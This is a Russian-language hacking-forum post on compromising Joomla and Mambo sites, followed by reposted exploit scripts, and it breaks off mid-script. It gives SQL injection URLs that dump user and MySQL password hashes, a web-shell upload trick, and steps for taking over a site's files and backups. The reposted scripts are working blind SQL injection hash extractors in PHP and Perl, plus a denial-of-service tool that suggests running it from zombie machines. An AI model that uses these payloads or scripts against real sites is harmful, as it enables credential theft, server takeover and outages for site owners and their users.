Обзор уязвимостей Joomla

[it's my]

CMS Joomla!

Хочу начать обзор со слов, что как бы Joomla не считалась одной из самых уязвимых CMS, на мой взгляд, Joomla очень даже не плохой движок со стороны безопасности. Проблема заключается в сторонних компонентах подключаемых к движкам и разработанных левыми (не разработчиками Джумлы) разработчиками. Но блогодаря сторонним компонентам эта CMS становиться интересной «изнутри» (в администраторской панели).

Доступ в администраторскую панель:
Здесь я коснусь двух найденных мною уязвимостей в Джумле.

1. Компонент SimpleFaq 2.х (com_simplefaq) *

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметре aid в установочном сценарии Joomla index.php (когда параметр \"option\" установлен в com_simplefaq и параметр task установлен в answer). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. (c) securitylab.ru

* я позже узнал, что эта уязвимость была найдена до меня

Уязвимые версии 2.х – 2.40

Внешний вид:


При запросе:

Код:

http://victim.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/*

Вежливо выдает логин, хеш (md5) и мыло:


Теперь остаётся расшифровать хеш и проходить в администраторскую панель.

Таким же образом можно получить доступ к БД MySQL, запросом:

Код:

http://victim.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,User,Password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/mysql.user/*

Ну и соответственно наш милый браузер выдаст следующее:



2. Компонент ReMOSitory 341RE (com_remository) *
Уязвимость существует из-за недостаточной обработки загружаемых файлов на сервер, и наличия прямого доступа к ним по дефолту.

* Данной уязвимости еще нигде не встречал

Внешний вид:


Теперь регистрируемся, и идем заливать файл (в нашем случае это шел))) по ссылке «Добавить файл»

После того как файл добавлен он автоматически загружается во временное хранилище (/downloads/uploads/), до одобрения администратора. Но мы ждать не будем и последуем по ссылке
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ] и увидим следующее:


Открываем... А дальше совсем другая история, которую не раз поднимали в пределах форума.

Администраторская панель.

Вот мы и добрались до намеченной цели, но мало попасть сюда, нужно еще и иметь доступ на добавление/редактирование/удаление файлов. Для этого есть два варианта:

1. В большинстве случаях (на моей практике это 95/100) доступны на запись следующие папки:

Цитата:

media/
administrator/components/
components/
images/stories/
administrator/modules/
modules/
language/
mambots/

А это гуд! Теперь не раздумывая, идем следующим путем: Установка/удаление => Компоненты. И смотря оттого, что именно нужно (а иногда нужно именно всё) устанавливаем следующие компоненты:

JoomlaXplorer 2.0 – подобие FTP сервера с возможностью установки прав на файлы, загрузка/редактирование/удаление файлов. Скрин:


Причем как можно заметить из скрина доступ обеспечивает не только на директорию сайта, но и если здесь же хостятся другие, то и к другим)))

JoomlaPack 1.1.0 – Компонент для создания архива данных (бэкап БД и Полный бэкап сайта с установочными файлами)


Здесь ничего сложного нет, просто идем по ссылке «Создать архив сайта», выбираем, что именно нужно создать (архив БД или архив сайта), создаем, потом идем по ссылке «Сохраненные архивы сайта» и скачиваем.

Теперь сайт под нашим чутким руководством)))

2. Использования шелла для поднятия рутовских прав, по этой возможности много статей можно найти пройдя по ссылке
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]

На этом всё. Ответственность за использования данной статьи предусмотрено Уголовным Кодексом Российской Федерации. Тема создана в познавательных целях.

JoomlaXplorer 2.0 –
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]
JoomlaPack 1.1.0. –
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]

Подборка сплоитов для CMS Joomla! И сторонних компонентов –
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ] – сплоиты (с) milw0rm.com

P.S. И помните каким бы ни был взлом, главное что бы он был безопасным (с) Анфиса Чехова

it's my (с) 2007

[REDsaratov]

Mambo 4.5.2.1 hash pass disclosur

PHP код:

#!/usr/bin/php -q
Mambo 4.5.2.1 + mysql 4.1 > fetch password hash by pokleyzz <pokleyzz at scan-associates.net>

<?php
/*
Mambo 4.5.2.1 + mysql 4.1 > fetch password hash by pokleyzz <pokleyzz at scan-associates.net>
*content rating using sub query to select from mos_users

Requirement:

    PHP 4.x with curl extension

Description:

The problem occur because $user_rating variable is not properly sanitize when for use in SQL query
for UPDATE statement. 

>From content.php (components\com_content\content.php)
-----
function recordVote ( $url, $user_rating, $cid, $database ){
    $cid = intval( $cid );
  
    if ( ( $user_rating >= 1 ) and ( $user_rating <= 5 ) ) { <--- 1st Checkpoint
        $currip = getenv( 'REMOTE_ADDR' );

        $query = "SELECT * FROM #__content_rating WHERE content_id = $cid";
        $database->setQuery( $query );
        $votesdb = NULL;
        
        if ( !( $database->loadObject( $votesdb ) ) ) {
            $query = "INSERT INTO #__content_rating ( content_id, lastip, rating_sum, rating_count )"
            . "\n VALUES ( '$cid', '$currip', '$user_rating', '1' )";
            $database->setQuery( $query );
            $database->query() or die( $database->stderr() );;
        } else {
            if ($currip <> ($votesdb->lastip)) { <-- 2nd Checkpoint
                
                $query = "UPDATE #__content_rating"
                . "\n SET rating_count = rating_count + 1,"
                . "\n rating_sum = rating_sum + $user_rating," <--- PROBLEM
                . "\n lastip = '$currip'"
                . "\n WHERE content_id = ". $cid
                ;
                $database->setQuery( $query );
                $database->query() or die( $database->stderr() );
            } else {
                mosRedirect ( $url, _ALREADY_VOTE );
            }
        }
        mosRedirect ( $url, _THANKS );
    }
}
-----
User may escape 1st checkpoint by passing (1-5)(string) value to $user_rating .In PHP beginning
number in string will be use when comparing number with string.

The 2nd checkpoint will check previous user's ip rated the content. Update statement will only 
execute when previous ip is different from current ip. This proof of concept will use cgi proxy from 
http://projectbypass.com to make it possible.

In mySQL 4.1 and above it is possible to use "sub select" in any SQL statement. We will using 
"blind fishing" with sub select to fetch password hash (md5) for supplied user id. 

Exploiting step:

1) rate from different ip
2) check time for standard page loading
3) check time for page loading when benchmark executed.
        * If error occur mysql version is < 4.1 (no support for sub select)
4) double the benchmark value. Blind fishing will use this value to do the query.
5) blind fishing with sub select.

Special thanks:

al3ndaleeb at hotmail.com

*/

if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}

ini_set("max_execution_time","999999");
 
$benchcount = 150000;
$aid= 62;
$cid = 2;
$charmap = array (48,49,50,51,52,53,54,55,56,57,
          97,98,99,100,101,102,
          103,104,105,
          106,107,108,109,110,111,112,113,
          114,115,116,117,118,119,120,121,122
          );
          
if($argv[1]){    
    $url = $argv[1];
    if ($argv[2])
        $aid = $argv[2];
    if ($argv[3])
        $benchcount = $argv[3];
    if ($argv[4])
        $proxy = $argv[4]; 
}
else {
    echo "Usage: ".$argv[0]." <URL> [userid] [benchmarkcount] [proxy]\n\n";
    echo "\tURL\t URL to mambo site (ex: http://127.0.0.1)\n";
    echo "\taid\t userid to get  (default: 62 (admin))\n";
    echo "\tbenchmarkcount\t benchmark count  (default: 150000)\n";
    echo "\tproxy\t optional proxy url  (ex: http://10.10.10.10:8080)\n"; 
    exit;
}



// rate from different ip (using http://projectbypass.com)

$projectbypass = "http://projectbypass.com/nph-proxy3.cgi/010110A/";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$projectbypass.str_replace("://","/",$url)."/index.php?option=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1");
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res = curl_exec($ch);
curl_close ($ch);

// standard page loading time
$start = time();
$ch = curl_init();
if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy); 
}
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res  = curl_exec($ch);
curl_close ($ch);
$stop = time();
$sloadtime = floatval($stop - $start);
echo "standard page loading =".$sloadtime."\n"; 

// benchmark page loading time
$start = time();
$ch = curl_init();
if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy); 
}
curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1,rating_sum=(select+1+from+mos_users+where+if(2>1,benchmark($benchcount,md5(1)),1))+where+content_id=$cid/*");
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res = curl_exec($ch);
curl_close ($ch);
$stop = time();
$bloadtime = floatval($stop - $start);
echo "bencmark page loading =".$bloadtime."\n"; 

// check if SQL query failed
if (ereg("DB function failed",$res)){
    echo "[x] mysql < 4.1 detected - not exploitable\n";
    exit();
}

if ($bloadtime <= $sloadtime + 2){
    echo "[x] increase your benchmark count\n";
    exit();
}

echo "Take your time for Teh Tarik... please wait ...\n\n";
echo "Result:\n";
echo "\tUserid = $aid\n";
echo "\tPassword Hash = ";

// starting fetch password

$benchcount = $benchcount*2;
        
for($i= 1;$i< 33;$i++){ 
    foreach ($charmap as $char){
        $start = time();
        echo chr($char);
        $ch = curl_init();
        if ($proxy){
            curl_setopt($ch, CURLOPT_PROXY,$proxy); 
        }
        curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1,rating_sum=(select+password+from+mos_users+where+id=$aid+and+if(ascii(substring(password,$i,1))=$char,benchmark($benchcount,md5(1)),1))+where+content_id=$cid/*");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        $res=curl_exec ($ch);
        curl_close ($ch);
        $stop = time();
        $xloadtime = floatval($stop - $start);
        if (floatval($xloadtime) > $bloadtime){
            $hash .= chr($char);
            break 1;
        }
        else {
            echo chr(8);
        }
        
        if ($char == 103){
            echo "\n\n\tNot Vulnerable or Something wrong occur ...\n";
            exit;
        }
        
    }
}
echo "\n";

?>

// milw0rm.com [2005-06-15]

Mambo 4.5.2.1 by RST

PHP код:

#!/usr/bin/perl

### Mambo <= 4.5.2.1, MySQL => 4.1 sql injection exploit by RST/GHC
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
### (c)oded by 1dt.w0lf , 21.06.05
### http://rst.void.ru , http://ghc.ru
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


use IO::Socket;

if (@ARGV < 3) { &usage; }

$server    = $ARGV[0];
$path      = $ARGV[1];
$member_id = $ARGV[2];

$news_id = 1;
$news_itemid = 1;

$server =~ s!(http://)!!;

$request  = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;
&head;
print "\r\n";
print " [~]  SERVER : $server\r\n";
print " [~]    PATH : $path\r\n";
print " [~] USER ID : $member_id\r\n";
print " [~] SEARCHING PASSWORD ... [|]";

while(1)
{
if(&found(47,58)==0) { &found(96,103); } 
$char = $i;
if ($char=="0") 
 { 
 if(length($allchar) > 0){
 print qq{bb DONE ] 
 ---------------------------------------------------------------
 USER ID : $member_id
    HASH : $allchar
 ---------------------------------------------------------------
 };
 }
 else
 {
 print "\b\b FAILED ]";
 }
 exit();  
 }
else 
 {  
 $allchar .= chr($char); 
 }
$s_num++;
}

sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
 
 $r = int($fmax - ($fmax-$fmin)/2);
 $check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }
 
sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i<$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }
 
sub check($)
 {
 $n++;
 status();
 $ccheck = $_[0]; 
 $sock1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
 printf $sock1 ("GET %sindex.php?option=com_content&task=vote&id=%d&Itemid=%d&cid=1&user_rating=1,rating_count=(SELECT/**/if((ascii(substring((SELECT/**/password/**/FROM/**/mos_users/**/WHERE/**/id=%d),%d,1)))%s,1145711457,0)),lastip=666/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
 $path,$news_id,$news_itemid,$member_id,$s_num,$ccheck,$server); 
 sleep 1; 
 $sock2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
 printf $sock2 ("GET %sindex.php?option=com_content&task=view&id=%d&Itemid=%d&cid=1 HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
 $path,$news_id,$news_itemid,$server);

 while(<$sock2>) 
  {   
  if (/1145711457/) { return 1; }
  } 

 return 0;
 }
 
sub status()
{
  $status = $n % 5;
  if($status==0){ print "\b\b/]";  }
  if($status==1){ print "\b\b-]";  }
  if($status==2){ print "\b\b\\]"; }
  if($status==3){ print "\b\b|]";  }
}

sub usage()
 {
 &head;
 print q(
 USAGE
    r57mambo.pl [HOST] [/FOLDER/] [USER_ID]
  
 OPTIONS
    HOST    - Host where mambo installed
    FOLDER  - Folder where mambo installed
    USER_ID - User ID for brute (default is 62 for admin)
  
 E.G.
    r57mambo.pl http://blah.com /mambo/ 62
 ---------------------------------------------------------------
 (c)oded by 1dt.w0lf
 RST/GHC , http://rst.void.ru , http://ghc.ru
 );
 exit();
 }
sub head()
 {
 print q(
 ---------------------------------------------------------------
 Mambo <= 4.5.2.1, MySQL => 4.1 sql injection exploit by RST/GHC
 ---------------------------------------------------------------
 );
 }

# milw0rm.com [2005-06-21] 


Mambo <= 4.6rc1 Weblinks blind SQL injection

PHP код:

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin credentials\r\n";
echo "disclosure exploit (benchmark() vesion)\r\n";
echo "by rgod 
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "this is called the Sun-Tzu 'trascendental guru meditation' tecnique\r\n\r\n";

if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to Mambo\r\n";
echo "user/pass: you need an account\r\n";
echo "Options:\r\n";
echo "   -T[prefix]   specify a table prefix different from 'mos_'\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /mambo/ username password\r\n";
die;
}

/*
  explaination:

  sql injection in "title" argument when you submit a web link, poc:
  start mysql daemon with log option...

  >mysqld --log=mambo.txt

  now login, go to "Submit Weblink" feature, in "Name: " field type:

  99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(200000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*

  in mambo.txt we have:

  13 Query       SELECT id FROM mos_weblinks
                 WHERE title='99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(50000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*' AND catid='2'

  injection is blind but, as you can see, we can you use time delays through Mysql
  benchmark() function to ask questions about tables

  this works regardless of magic_quotes_gpc settings

*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
    }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="mos_";
$proxy="";
for ($i=5; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
  $prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data ="username=".$user;
$data.="&passwd=".$pass;
$data.="&remember=yes";
$data.="&option=login";
$data.="&Submit=login";
$data.="&op2=login";
$data.="&lang=english";
$data.="&return=".urlencode("http://".$host.$path);
$data.="&message=0";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=1; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
if ((strstr($cookie,"=+;")) | $cookie=="") {die("Unable to login...");}
else
{
echo "Done...\r\ncookie -> ".$cookie."\r\n";
}

$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$starttime=time();
$sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(username,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";
echo "\r\n".$sql."\r\n";
$sql=urlencode($sql);
$data ="title=".$sql;
$data.="&catid=2";
$data.="&url=http://www.google.com";
$data.="&description=";
$data.="&id=0";
$data.="&option=com_weblinks";
$data.="&task=save";
$data.="&ordering=0";
$data.="&approved=0";
$data.="&Returnid=0";
$packet ="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
$packet.=$data;
//debug
//echo quick_dump($packet)."\r\n";
sendpacketii($packet);
$endtime=time();
echo "endtime -> ".$endtime."\r\n";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."\r\n";
if ($difftime > 7) {$admin.=chr($i);echo "admin -> ".$admin."[???]\r\n";sleep(2);break;} //more than seven seconds? we succeed...
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
  $starttime=time();
  $sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(password,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";
  echo "\r\n".$sql."\r\n";
  $sql=urlencode($sql);
  $data ="title=".$sql;
  $data.="&catid=2";
  $data.="&url=http://www.google.com";
  $data.="&description=";
  $data.="&id=0";
  $data.="&option=com_weblinks";
  $data.="&task=save";
  $data.="&ordering=0";
  $data.="&approved=0";
  $data.="&Returnid=0";
  $packet ="POST ".$p."index.php HTTP/1.0\r\n";
  $packet.="User-Agent: Googlebot/2.1\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Accept: text/plain\r\n";
  $packet.="Connection: Close\r\n";
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
  $packet.="Cookie: ".$cookie."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n\r\n";
  $packet.=$data;
  //debug
  //echo quick_dump($packet)."\r\n";
  sendpacketii($packet);
  $endtime=time();
  echo "endtime -> ".$endtime."\r\n";
  $difftime=$endtime - $starttime;
  echo "difftime -> ".$difftime."\r\n";
  if ($difftime > 7) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
  if ($i==255) {die("Exploit failed...");}
  }
  $j++;
}
//if you are here...
echo "Exploit succeeded...\r\n";
echo "--------------------------------------------------------------------\r\n";
echo "admin          -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";
?>

# milw0rm.com [2006-06-17]

Mambo/Joomla Path Disclosure & Remote DOS Exploit

PHP код:

<?php
#             Mambo/Joomla Path Disclosure & Remote DOS Exploit               #
#                               by trueend5                                   #
#              Computer Security Science Researchers Institute                #
#                           [http://www.KAPDA.ir]                             #
#                                                                             #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 5);
ob_implicit_flush (1);

echo'<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Mambo/Joomla Remote DOS Exploit</title>
</head>

<body bgcolor="#FFCCFF">

<p align="center"><font size="4" color="#0000FF">Mambo/Joomla Path Disclosure &amp;
(IIS Server-isapi mod) Remote Denial Of Service</font></p>
<p class="Stile6" align="center"><font size="3" color="#FF0000">by trueend5</font></p>
<p align="center"><font size="4" color="#008000">Computer Security Science Researchers
Institute</font></p>
<font SIZE="3">
<p align="center"><a href="http://www.kapda.ir">KAPDA</a></p>
<p align="center">&nbsp;</p>
</font>
<table width="90%">
  <tbody>
    <tr>
      <td width="43%" align="left">
        <form name="form1" action="'.$SERVER[PHP_SELF].'" method="post">
          <p><input name="host" size="20"> <span class="Stile5"><font color="#FF0000">*</font> hostname (ex: www.sitename.com)</span></p>
          <p><input name="path" size="20"> <span class="Stile5"><font color="#FF0000">*</font> path (ex:
          /mambo/
          or just / )</span></p>
          <p><input name="pref" size="20"> <span class="Stile5">prefix (default is
            &quot;kap&quot;)</span></p>
          <p>&nbsp;useful when you want to Run this script
            twice or more at the same time against a target For DDOS.</p>
            <p>&nbsp; to perform it Just rename this file and choose a different
            prefix and run the exploits from your system ,</p>
            <p>&nbsp; remote locations or from&nbsp; zombies machines.</p>
            <p>&nbsp; (quintuplet or more is recommended to cause&nbsp; remote server
            crash for a none dedicated host)</p>
          <p><input name="port" size="20"><span class="Stile5"> specify a port&nbsp;
          (default is 80)</span></p>
          <p><input name="proxy" size="20"><span class="Stile5"> send exploit
          through an HTTP proxy (ip:port)</span></p>
          <p align="center"> <span class="Stile5"><font color="#FF0000">&nbsp;&nbsp;
          * </font>fields are required</span></p>
          <p align="center"><span class="Stile5">-----------------------------------------------------------------------------------------------</span></p>

          <p><input type="submit" value="Start" name="Submit"></p>
        </form>
      </td>
    </tr>
  </tbody>
</table>
</body></html>';

function show($headeri)
{
  $ii=0;$ji=0;$ki=0;$ci=0;
  echo '<table border="0"><tr>';
  while ($ii <= strlen($headeri)-1){
    $datai=dechex(ord($headeri[$ii]));
    if ($ji==16) {
      $ji=0;
      $ci++;
      echo "<td>&nbsp;&nbsp;</td>";
      for ($li=0; $li<=15; $li++) {
        echo "<td>".$headeri[$li+$ki]."</td>";
        }
      $ki=$ki+16;
      echo "</tr><tr>";
    }
    if (strlen($datai)==1) {
      echo "<td>0".$datai."</td>";
    }
    else {
      echo "<td>".$datai."</td> ";
    }
    $ii++;$ji++;
  }
  for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
    echo "<td>&nbsp&nbsp</td>";
  }
  for ($li=$ci*16; $li<=strlen($headeri); $li++) {
    echo "<td>".$headeri[$li]."</td>";
  }
  echo "</tr></table>";
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.htmlentities($host); die;
    }
  }
  else {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy';die;
    }
    $parts=explode(':',$proxy);
    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
    }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  //if ($GLOBALS['view']==1) {echo nl2br(htmlentities($html));}
}

$host=$_POST[host];
$path=$_POST[path];
$port=$_POST[port];
$pref=$_POST[pref];

if (($host<>'') and ($path<>'')){
{
  $port=intval(trim($port));
  $pref=(trim($pref));
  if ($port=='') {$port=80;}
  if ($pref=='') {$pref='kap';}
  if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');}
  if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
  $host=str_replace("\r\n","",$host);
  $path=str_replace("\r\n","",$path);
  echo ' Try to find installaton path ...';
  $packet="GET ".$p."index2.php?option=com_rss&feed=test\/>"." HTTP/1.1\r\n";
  $packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Connection: Close\r\n\r\n";
  show($packet);
  sendpacketii($packet);
  if (eregi("fopen",$html)){
  $arr = array("fopen(","test"); $rep = array("\n\n\n\nThe installation path is:\n","\n\n\n\n");
  $html = str_replace($arr, $rep, $html);
  echo nl2br(htmlentities($html));} else
  {echo "error reporting is Off, Can not receive the installation path";}
 }
  echo "try to create superfluous files on remote server: \r\n";
  for ($n = 1; $n <= 4000; $n++) {
  $packet="GET ".$p."index2.php?option=com_rss&feed=".$pref.$n." HTTP/1.1\r\n";
  $packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Connection: Close\r\n\r\n";
  sendpacketii($packet);
  echo "$pref$n.xml created|\t";
  }
  echo "Exploit finished";
}
else
{echo "Note: if you received time exceeded error, run again the xpl with new prefix";}

?>

# milw0rm.com [2006-04-19]

Joomla <= 1.0.9 Weblinks blind SQL injection

PHP код:

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Joomla <= 1.0.9 'Weblinks' blind SQL injection / admin credentials\r\n";
echo "disclosure exploit (benchmark() vesion)\r\n";
echo "by rgod 
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]\r\n";
echo "site: http://retrogod.altervista.org\r\n";

if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to Joomla\r\n";
echo "user/pass: you need an account\r\n";
echo "Options:\r\n";
echo "   -T[prefix]   specify a table prefix different from 'jos_'\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /joomla/ username password\r\n";
die;
}

/*
  explaination:

  same of http://retrogod.altervista.org/mambo_46rc1_sql.html
  with some modifications to work against Joomla
  and with an always true statement, to avoid to flood admin of e-mail notifications
  about submissions (they simply do not succeed but injection works aswell)
*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
